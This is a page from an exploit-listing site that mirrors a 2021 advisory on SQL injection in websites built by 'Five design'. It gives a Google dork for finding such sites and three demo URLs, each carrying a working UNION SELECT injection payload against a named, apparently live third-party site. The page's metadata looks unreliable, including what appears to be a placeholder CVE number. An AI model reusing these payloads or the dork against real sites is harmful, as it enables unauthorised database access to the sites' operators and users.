Advertisement






Five design - Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 Critical
Author Risk Exploitation Type Date
ExploitAuthor High Remote 2021-09-10
CPE
cpe:cpe:/a:five-design:web_application:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/B:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090069

Below is a copy:

Five design - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Five design -  Sql Injection Vulnerability
#Date: 2021-09-10
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website designed and developed by Five design"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Website designed and developed by Five design"


### Demo :
http://linoperros.com/product-detail.php?women=-263%27%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+&name=Lino%20Perros%20Women%20Off-white%20Coloured%20Satchel%20Bag&category=Hand%20Bags&id=422

http://cssudhakar.in/productdetails.php?id=-77%27%20union%20select%201,2,version(),4,5,6,7,8--+

http://stecker.in/product.php?id=-53%27%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12--+
********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.